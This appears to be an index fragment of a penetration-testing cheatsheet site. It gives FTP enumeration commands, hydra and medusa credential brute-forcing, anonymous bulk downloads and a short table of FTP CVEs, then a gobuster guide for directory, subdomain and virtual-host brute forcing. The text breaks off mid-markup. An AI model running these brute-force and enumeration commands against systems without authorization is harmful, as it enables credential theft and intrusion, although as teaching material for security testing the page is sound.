anonymous:anonymous\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -v ftp://\u0026lt;ip\u0026gt;/\u0026lt;path\u0026gt;/ --user anonymous:anonymous\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ftp-commands-once-connected\"\u003eFTP Commands (Once Connected)\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eUSER \u0026lt;username\u0026gt;          # Send username\nPASS \u0026lt;password\u0026gt;          # Send password\nSYST                     # Display system type\nSTAT                     # Status / verbose file listing\nLIST                     # List files (verbose)\nNLST                     # 
Name list (simple)\nPWD                      # Print working directory\nCWD \u0026lt;dir\u0026gt;                # Change directory\nGET \u0026lt;file\u0026gt;               # Download file\nPUT \u0026lt;file\u0026gt;               # Upload file\nMGET *                   # Download all files\nBINARY                   # Switch to binary transfer mode\nASCII                    # Switch to ASCII transfer mode\nPASV                     # Enter passive mode\nQUIT                     # Disconnect\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-ftp-scripts\"\u003eNmap FTP Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e --script ftp-anon \u0026lt;ip\u0026gt;             \u003cspan style=\"color:#75715e\"\u003e# Check anonymous login\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e --script ftp-banner \u0026lt;ip\u0026gt;           \u003cspan style=\"color:#75715e\"\u003e# Banner grab\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e --script ftp-brute \u0026lt;ip\u0026gt;            \u003cspan style=\"color:#75715e\"\u003e# Brute force credentials\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e --script ftp-bounce \u0026lt;ip\u0026gt;           \u003cspan style=\"color:#75715e\"\u003e# FTP bounce attack 
check\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e --script ftp-syst \u0026lt;ip\u0026gt;             \u003cspan style=\"color:#75715e\"\u003e# SYST command response\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e --script ftp-vsftpd-backdoor \u0026lt;ip\u0026gt;  \u003cspan style=\"color:#75715e\"\u003e# vsFTPd 2.3.4 backdoor check\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e21\u003c/span\u003e -sV --script ftp-* \u0026lt;ip\u0026gt;            \u003cspan style=\"color:#75715e\"\u003e# Run all FTP scripts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt ftp://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -L users.txt -P wordlist.txt ftp://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emedusa -u \u0026lt;user\u0026gt; -P wordlist.txt -h \u0026lt;ip\u0026gt; -M ftp\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"bulk-download\"\u003eBulk Download\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# wget recursive download (no passive mode)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewget -m --no-passive ftp://anonymous:anonymous@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# curl recursive\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s ftp://\u0026lt;ip\u0026gt;/ --user anonymous:anonymous | awk \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;{print $NF}\u0026#39;\u003c/span\u003e | \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  \u003cspan style=\"color:#66d9ef\"\u003ewhile\u003c/span\u003e read f; \u003cspan style=\"color:#66d9ef\"\u003edo\u003c/span\u003e curl -s ftp://\u0026lt;ip\u0026gt;/$f --user anonymous:anonymous -O; \u003cspan style=\"color:#66d9ef\"\u003edone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"key-vulnerabilities\"\u003eKey Vulnerabilities\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eSoftware\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eCVE\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003evsFTPd 
2.3.4\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2011-2523\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBackdoor shell on port 6200\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eProFTPd 1.3.5\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2015-3306\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003emod_copy unauthenticated file copy\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eProFTPd 1.3.3c\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2010-4221\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRemote heap overflow\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e","title":"FTP"},{"content":"gobuster Cheatsheet Type: Multi-purpose brute-forcing tool — directories, files, DNS subdomains, virtual hosts, S3 buckets\nInstallation sudo apt install gobuster # or go install github.com/OJ/gobuster/v3@latest Modes Mode Description dir Directory and file brute forcing dns DNS subdomain brute forcing vhost Virtual host discovery fuzz Fuzzing (replace FUZZ keyword anywhere in URL) s3 AWS S3 bucket enumeration gcs Google Cloud Storage bucket enumeration Global Flags Flag Description -w \u0026lt;wordlist\u0026gt; Wordlist path -t \u0026lt;n\u0026gt; Threads (default: 10) -o \u0026lt;file\u0026gt; Output to file -q Quiet — only print results -v Verbose --no-error Suppress errors -z No progress bar --delay \u0026lt;ms\u0026gt; Delay between requests dir — Directory \u0026amp; File Brute Force # Basic scan gobuster dir -u http://\u0026lt;ip\u0026gt; -w wordlist.txt # Common flags gobuster dir -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ -t 50 \\ # 50 threads -x php,html,txt,bak \\ # File extensions -s 200,204,301,302,307 \\ # Status codes to show -b 404,403 \\ # Status codes to exclude --timeout 10s \\ # Request timeout -k \\ # Skip TLS verification -c \u0026#34;PHPSESSID=abc123\u0026#34; \\ # Cookie -H \u0026#34;Authorization: Bearer tok\u0026#34; \\ # Custom header -U \u0026lt;user\u0026gt; -P 
\u0026lt;pass\u0026gt; \\ # HTTP Basic auth -r \\ # Follow redirects -e \\ # Print full URL -o results.txt # HTTPS target gobuster dir -u https://\u0026lt;ip\u0026gt; -w wordlist.txt -k # Custom User-Agent gobuster dir -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ -a \u0026#34;Mozilla/5.0\u0026#34; dir Flags Flag Description -u \u0026lt;url\u0026gt; Target URL -x \u0026lt;ext\u0026gt; File extensions (comma-separated) -s \u0026lt;codes\u0026gt; Allowed status codes -b \u0026lt;codes\u0026gt; Blacklisted status codes -r Follow redirects -k Skip TLS certificate verification -c \u0026lt;cookie\u0026gt; Cookie string -H \u0026lt;header\u0026gt; Extra header (repeatable) -U / -P HTTP Basic auth username/password -e Print full URL in output -l Print response length --timeout \u0026lt;dur\u0026gt; Request timeout --wildcard Force continue if wildcard found --exclude-length \u0026lt;n\u0026gt; Exclude responses of this length dns — Subdomain Brute Force # Basic DNS brute force gobuster dns -d \u0026lt;domain\u0026gt; -w wordlist.txt # With specific resolver gobuster dns -d example.com -w wordlist.txt -r 8.8.8.8 # Show IP addresses gobuster dns -d example.com -w wordlist.txt -i # Wildcard override gobuster dns -d example.com -w wordlist.txt --wildcard dns Flags Flag Description -d \u0026lt;domain\u0026gt; Target domain -r \u0026lt;resolver\u0026gt; Custom DNS resolver -i Show IP addresses of found subdomains --wildcard Force scan even if wildcard DNS detected vhost — Virtual Host Discovery # Basic vhost scan gobuster vhost -u http://\u0026lt;ip\u0026gt; -w wordlist.txt # Append domain to wordlist entries gobuster vhost -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ --append-domain \\ --domain example.com # Filter out specific response length (removes default/fallback page) gobuster vhost -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ --append-domain \\ --exclude-length 290 # HTTPS gobuster vhost -u https://\u0026lt;ip\u0026gt; -w wordlist.txt -k --append-domain 
vhost Flags Flag Description -u \u0026lt;url\u0026gt; Target URL --append-domain Append base domain to each word --domain \u0026lt;domain\u0026gt; Base domain to append --exclude-length \u0026lt;n\u0026gt; Exclude responses of this content length fuzz — Generic Fuzzing # Fuzz a parameter value gobuster fuzz -u \u0026#34;http://\u0026lt;ip\u0026gt;/page.php?id=FUZZ\u0026#34; -w wordlist.txt # Fuzz with status filter gobuster fuzz -u \u0026#34;http://\u0026lt;ip\u0026gt;/FUZZ.php\u0026#34; -w wordlist.txt -b 404 Recommended Wordlists # Directories /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt /usr/share/seclists/Discovery/Web-Content/common.txt /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt # Files (with extensions) /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt # Virtual hosts / subdomains /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt Example Full Runs # Directory + file scan gobuster dir \\ -u http://example.com \\ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \\ -x php,html,txt,bak,zip \\ -t 50 -e -l \\ -o gobuster_dir.txt # Virtual host discovery gobuster vhost \\ -u http://example.com \\ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ --append-domain \\ --exclude-length 290 \\ -t 50 \\ -o gobuster_vhost.txt ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/gobuster/","summary":"\u003ch1 id=\"gobuster-cheatsheet\"\u003egobuster Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Multi-purpose brute-forcing tool — directories, files, DNS subdomains, virtual hosts, S3 buckets\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install gobuster\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ego install github.com/OJ/gobuster/v3@latest\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"modes\"\u003eModes\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eMode\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003edir\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDirectory and file brute forcing\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003edns\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDNS subdomain brute forcing\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003evhost\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVirtual host discovery\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003efuzz\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFuzzing (replace FUZZ keyword anywhere in URL)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003es3\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAWS S3 bucket 
enumeration\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003egcs\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eGoogle Cloud Storage bucket enumeration\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"global-flags\"\u003eGlobal Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-w \u0026lt;wordlist\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWordlist path\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eThreads (default: 10)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput to file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-q\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eQuiet — only print results\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--no-error\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSuppress errors\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-z\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNo progress bar\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--delay 
\u0026lt;ms\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDelay between requests\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"dir--directory--file-brute-force\"\u003edir — Directory \u0026amp; File Brute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dir -u http://\u0026lt;ip\u0026gt; -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Common flags\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dir -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -t \u003cspan style=\"color:#ae81ff\"\u003e50\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e                         \u003cspan style=\"color:#75715e\"\u003e# 50 threads\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -x php,html,txt,bak \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e           \u003cspan style=\"color:#75715e\"\u003e# File extensions\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -s 200,204,301,302,307 \u003cspan 
style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e        \u003cspan style=\"color:#75715e\"\u003e# Status codes to show\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -b 404,403 \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e                    \u003cspan style=\"color:#75715e\"\u003e# Status codes to exclude\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --timeout 10s \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e                 \u003cspan style=\"color:#75715e\"\u003e# Request timeout\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -k \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e                            \u003cspan style=\"color:#75715e\"\u003e# Skip TLS verification\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -c \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;PHPSESSID=abc123\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e         \u003cspan style=\"color:#75715e\"\u003e# Cookie\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Authorization: Bearer tok\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e\u003cspan style=\"color:#75715e\"\u003e# Custom header\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e           \u003cspan style=\"color:#75715e\"\u003e# HTTP Basic auth\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -r \u003cspan 
style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e                            \u003cspan style=\"color:#75715e\"\u003e# Follow redirects\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -e \u003cspan style=\"color:#ae81ff\"\u003e\\ \u003c/span\u003e                            \u003cspan style=\"color:#75715e\"\u003e# Print full URL\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -o results.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# HTTPS target\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dir -u https://\u0026lt;ip\u0026gt; -w wordlist.txt -k\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Custom User-Agent\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egobuster dir -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -a \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Mozilla/5.0\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"dir-flags\"\u003edir 
Flags\u003c/h3\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-u \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget URL\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-x \u0026lt;ext\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFile extensions (comma-separated)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-s \u0026lt;codes\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAllowed status codes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-b \u0026lt;codes\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBlacklisted status codes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFollow redirects\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-k\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSkip TLS certificate verification\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-c \u0026lt;cookie\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCookie string\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-H \u0026lt;header\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eExtra header (repeatable)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-U / -P\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP Basic 
auth username/password\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-e\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePrint full URL in output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-l\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePrint response length\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--timeout \u0026lt;dur\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRequest timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--wildcard\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eForce continue if wildcard found\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--exclude-length \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eExclude responses of this length\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"dns--subdomain-brute-force\"\u003edns — Subdomain Brute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan 